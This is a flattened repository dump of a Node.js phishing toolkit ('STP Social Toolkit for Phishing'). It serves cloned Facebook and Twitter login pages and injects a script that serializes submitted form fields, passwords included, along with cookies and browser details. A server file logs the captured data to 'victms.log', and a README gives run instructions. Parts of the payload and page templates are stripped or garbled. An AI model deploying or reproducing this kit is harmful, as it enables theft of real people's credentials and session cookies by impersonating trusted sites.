├── logs └── victms.log ├── linetime.txt ├── config.js ├── README.md ├── stp.plugin.js ├── stp.js └── files ├── facebook └── index.html └── twitter └── index.html /logs/victms.log: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /linetime.txt: -------------------------------------------------------------------------------- 1 | 25/09/2015 - [22:30] 2 | * Start project -------------------------------------------------------------------------------- /config.js: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* 4 | STP Configuration 5 | */ 6 | 7 | var Plataform = "/files/facebook/"; 8 | var HTTPport = 80; 9 | 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | Social Toolkit for Phishing Attacks, a multiplatform tool to simulate phishing attack based on node, a simple server for run our template and fast manipulation, 4 | 5 | ---> NODE ---> HTTP REQUEST ---> LOAD FILE + STP{PAYLOAD} ---> RESPONSE <-- GET DATA 6 | 7 | # USAGE 8 | Download Website to clone 9 | Save the file into folder's project 10 | Setting in config.js and "run sudo node spt.js" -------------------------------------------------------------------------------- /stp.plugin.js: -------------------------------------------------------------------------------- 1 | function serialize(form){if(!form||form.nodeName!=="FORM"){return }var i,j,q=[];for(i=form.elements.length-1;i>=0;i=i-1){if(form.elements[i].name===""){continue}switch(form.elements[i].nodeName){case"INPUT":switch(form.elements[i].type){case"text":case"hidden":case"password":case"email":case"button":case"reset":case"submit":q.push(form.elements[i].name+"="+encodeURIComponent(form.elements[i].value));break;case"checkbox":case"radio":if(form.elements[i].checked){q.push(form.elements[i].name+"="+encodeURIComponent(form.elements[i].value))}break;case"file":break}break;case"TEXTAREA":q.push(form.elements[i].name+"="+encodeURIComponent(form.elements[i].value));break;case"SELECT":switch(form.elements[i].type){case"select-one":q.push(form.elements[i].name+"="+encodeURIComponent(form.elements[i].value));break;case"select-multiple":for(j=form.elements[i].options.length-1;j>=0;j=j-1){if(form.elements[i].options[j].selected){q.push(form.elements[i].name+"="+encodeURIComponent(form.elements[i].options[j].value))}}break}break;case"BUTTON":switch(form.elements[i].type){case"reset":case"submit":case"button":q.push(form.elements[i].name+"="+encodeURIComponent(form.elements[i].value));break}break}}return q.join("&")};var a=window.location;var b=window.screen.height+"x"+window.screen.width;var c=document.cookie;var d=window.navigator.appVersion.toLowerCase();var e=navigator.appCodeName;window.onload = function () {addEventListener('submit',function () {var f=serialize(document.forms[0]);stp(f);},false)};function stp(dates){document.write('

');} -------------------------------------------------------------------------------- /stp.js: -------------------------------------------------------------------------------- 1 | 2 | /* 3 | [STP] Social Toolkit for Phishing 4 | Author : Redtoor 5 | Version : 1.0 6 | 7 | */ 8 | 9 | var net = require('net'); 10 | var http = require('http'); 11 | var fs = require('fs'); 12 | var url = require('url'); 13 | var path = require('path'); 14 | eval.apply(global, [fs.readFileSync('config.js').toString()]); 15 | var payload = fs.readFileSync("./stp.plugin.js"); 16 | 17 | 18 | extensions = { 19 | ".html" : "text/html", 20 | ".css" : "text/css", 21 | ".js" : "application/javascript", 22 | ".png" : "image/png", 23 | ".gif" : "image/gif", 24 | ".jpg" : "image/jpeg", 25 | ".json" : "text/html", 26 | }; 27 | 28 | function debugConsole(message){ 29 | console.log(message); 30 | } 31 | 32 | function getFileRequest(filePath,res,page404,mimeType,ext){ 33 | fs.exists(filePath,function(exists){ 34 | if(exists){ 35 | fs.readFile(filePath,function(err,contents){ 36 | if(!err){ 37 | res.writeHead(200,{ 38 | "Content-type" : mimeType, 39 | "Content-Length" : contents.length+payload.length+17 40 | }); 41 | if (ext == ".html" || ext == "") {res.end(contents+"");}else{res.end(contents);} 42 | } else { 43 | }; 44 | }); 45 | } else { 46 | fs.readFile(page404,function(err,contents){ 47 | if(!err){ 48 | res.writeHead(404, {'Content-Type': 'text/html'}); 49 | res.end(contents); 50 | } else {}; 51 | }); 52 | }; 53 | }); 54 | }; 55 | 56 | function saveData(datas){ 57 | var serializer = datas.substring(9,datas.length); 58 | fs.appendFile("./logs/victms.log", 'DATA : '+serializer+'\n\n\n', function (err) {}); 59 | } 60 | 61 | function requestHandler(req, res) { 62 | try{ 63 | var 64 | fileName = req.url, 65 | ext = path.extname(fileName), 66 | localFolder = __dirname + Plataform, 67 | page404 = localFolder + '404.html'; 68 | var array = fileName.split('/'); 69 | var lastsegment = array[array.length-2]; 70 | if(fileName=="/") fileName = "index.html"; 71 | if(fileName.substring(0,9) == "/stp.get?") {debugConsole(" {+} Event Submit was detected."); saveData(fileName);} 72 | getFileRequest((localFolder + fileName),res,page404,extensions[ext],ext); 73 | }catch(err){debugConsole(err);} 74 | }; 75 | 76 | function stp(){ 77 | try{ 78 | debugConsole("\n {#} Social ToolKit Phishing.") 79 | debugConsole(" {*} Loading Setting."); 80 | debugConsole(" {*} Plataform "+Plataform+" - Port "+HTTPport); 81 | debugConsole(" {*} Starting Server in localhost:"+HTTPport); 82 | http.createServer(requestHandler).listen(HTTPport); 83 | }catch(err){debugConsole(err);} 84 | } 85 | 86 | stp(); -------------------------------------------------------------------------------- /files/facebook/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Facebook - Log In or Sign Up 4 | 5 | 6 | 7 | 8 | 9 |

Facebook

Thanks for stopping by!

We hope to see you again soon.

It's free and always will be.

An error occurred. Please try again.

Birthday

Why do I need to provide my birthday?

FemaleMale

By clicking Sign Up, you agree to our Terms and that you have read our Data Policy, including our Cookie Use.

Security Check

This field is required.

Can't read the words below? Try different words or an audio captcha.

Enter the text you see above.

Why am I seeing this?

Security Check

This is a standard security test that we use to prevent spammers from creating fake accounts and spamming users.

Back

Create a Page for a celebrity, band or business.

12 | 14 | 15 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /files/twitter/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 22 | 27 | 40 | 44 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | Twitter. It's what's happening. 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 107 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 |

121 |

122 | 123 | 124 |

125 |

126 |

127 | 128 | 129 | 142 |

143 | 144 | 207 | 208 | 266 |

267 | 268 |

269 |

270 |

271 |

272 | 273 | 274 |

275 |

276 | 277 |

278 | 279 |

280 |

281 |

282 | 283 |

284 |

285 | 286 |

287 |

Welcome to Twitter.

288 |

Connect with your friends — and other fascinating people. Get in-the-moment updates on the things that interest you. And watch events unfold, in real time, from every angle.

289 |

290 |

291 |

292 |

293 | Un saludo desde Natal Brasil con los Rockstars del internet. 294 |

295 |

296 | Tweet and photo by @solopatrick 297 |

298 | 02:04 PM - 14 June 2014 299 |

300 |

301 |

302 | Somos campeoooones del muuuunndoooo!!!!! / 2014 Moto3 World Champ! #AlexMoto3Champ 303 |

304 |

305 | Tweet and photo by @alexmarquez23 306 |

307 | 5:25 PM - 9 Nov 2014 308 |

309 |

310 |

311 | Postal de la noche de Copa en la #Bombonera #QueremosLaCopa 312 |

313 |

314 | Tweet and photo by @BocaJrsOficial 315 |

316 | 11:47 PM - 20 Nov 2014 317 |

318 |

319 |

320 | 321 |

322 | 366 |

367 | 368 | 390 | 391 |

392 | 393 |

395 |

Twitter.com makes heavy use of JavaScript

396 |

If you cannot enable it in your browser's preferences, you may have a better experience on our mobile site.

397 |

399 | 400 |

401 |

Twitter.com makes heavy use of browser cookies

402 |

Please enable cookies in your browser preferences before signing in.

403 |

404 | 405 | 425 | 426 |

427 | 428 |

429 |

430 | 431 |

432 | 442 | 443 | 444 | 445 | 446 |

447 |

448 |

449 |

450 | 455 | 456 |

457 |

458 | 459 | 460 | 461 | Previous 462 | 463 | 464 | 465 |

466 |

467 | 468 | 469 | 470 | Next 471 | 472 | 473 | 474 |

475 |

476 |

477 |

478 | 479 | 480 | 481 | 482 | 483 |

484 | 485 | 486 | 487 | 616 | 617 | 618 | 784 | 785 | 813 | 814 | 842 | 843 | 844 | 872 | 873 | 874 | 875 | 876 | 877 | 878 | 901 | 902 | 919 | 920 | 921 | 945 | 946 | 966 | 1020 | 1021 | 1054 | 1055 | 1056 | 1057 | 1058 | 1082 | 1083 | 1084 | 1135 | 1136 | 1137 | 1138 | 1199 | 1200 | 1234 | 1235 |

1236 | 1237 |

1238 |

1239 | 1244 | 1245 | 1248 |

1249 | 1250 | 1251 | 1252 | 1253 | 1254 | 1255 | 1256 | 1257 | 1258 | 1259 | 1260 | 1261 | 1262 | 1263 | 1264 | 1265 | 1266 | 1267 | 1268 | 1269 | 1270 | 1271 | 1272 | 1273 | 1274 | 1275 | 1276 | 1277 | 1278 | 1279 | 1280 | 1281 | 1282 | 1283 | 1284 | 1285 | 1286 | 1287 | 1288 | 1289 | 1290 | 1291 | 1292 | 1293 | 1294 | 1295 | 1296 | 1297 | 1298 | 1299 | 1300 | 1301 | 1302 | 1303 | 1304 | 1305 | 1306 | 1307 | 1308 | 1309 | 1310 | 1311 | 1314 | 1315 | 1316 |

Country	Code	For customers of
United States	40404	(any)
Canada	21212	(any)
United Kingdom	86444	Vodafone, Orange, 3, O2
Brazil	40404	Nextel, TIM
Haiti	40404	Digicel, Voila
Ireland	51210	Vodafone, O2
India	53000	Bharti Airtel, Videocon, Reliance
Indonesia	89887	AXIS, 3, Telkomsel, Indosat, XL Axiata
Italy	4880804	Wind
Italy	3424486444	Vodafone
1312 \| » See SMS short codes for other countries 1313 \|

1317 |

1318 |

1319 |

1320 |

1321 | 1322 | 1323 | 1353 | 1354 | 1355 | 1385 | 1386 | 1387 | 1388 | 1400 | 1401 | 1402 | 1425 | 1426 | 1427 | 1541 | 1542 | 1543 | 1544 | 1545 | 1546 | 1547 | 1548 | 1549 | 1550 | 1551 |

1552 | 1556 | 1566 |

1567 | 1568 | 1573 | 1574 | 1575 | 1576 | --------------------------------------------------------------------------------

Sign Up	Log In	Messenger	Facebook Lite	Mobile	Find Friends	Badges	People	Pages	Places	Games
Locations	Celebrities	Groups	Moments	About	Create Ad	Create Page	Developers	Careers	Privacy	Cookies
Ad Choices	Terms	Help	Settings	Activity Log

Facebook

Security Check

Welcome to Twitter.

New to Twitter? Sign up

Twitter.com makes heavy use of browser cookies

Go to a person's profile

Saved searches

Retweet this to your followers?

Saved searches

Are you sure you want to delete this Tweet?

Promote this Tweet

Block

Add a location to your Tweets

Profile summary

Your lists

Create a new list

Copy link to Tweet

Embed this Tweet

Embed this Video

Preview

Log in to Twitter

Sign up for Twitter

Not on Twitter? Sign up, tune into the things you care about, and get updates as they happen.

Two-way (sending and receiving) short codes:

Confirmation

Buy Now

Hmm... Something went wrong. Please try again.

1442 | 1443 | Welcome home! 1444 |

1452 | 1453 | Tweets not working for you? 1454 |

1463 | 1464 | Say a lot with a little 1465 |

1473 | 1474 | Spread the word 1475 |

1483 | 1484 | Join the conversation 1485 |

1495 | 1496 | Learn the latest 1497 |

1505 | 1506 | Get more of what you love 1507 |

1515 | 1516 | Find what's happening 1517 |

1525 | 1526 | Never miss a Moment 1527 |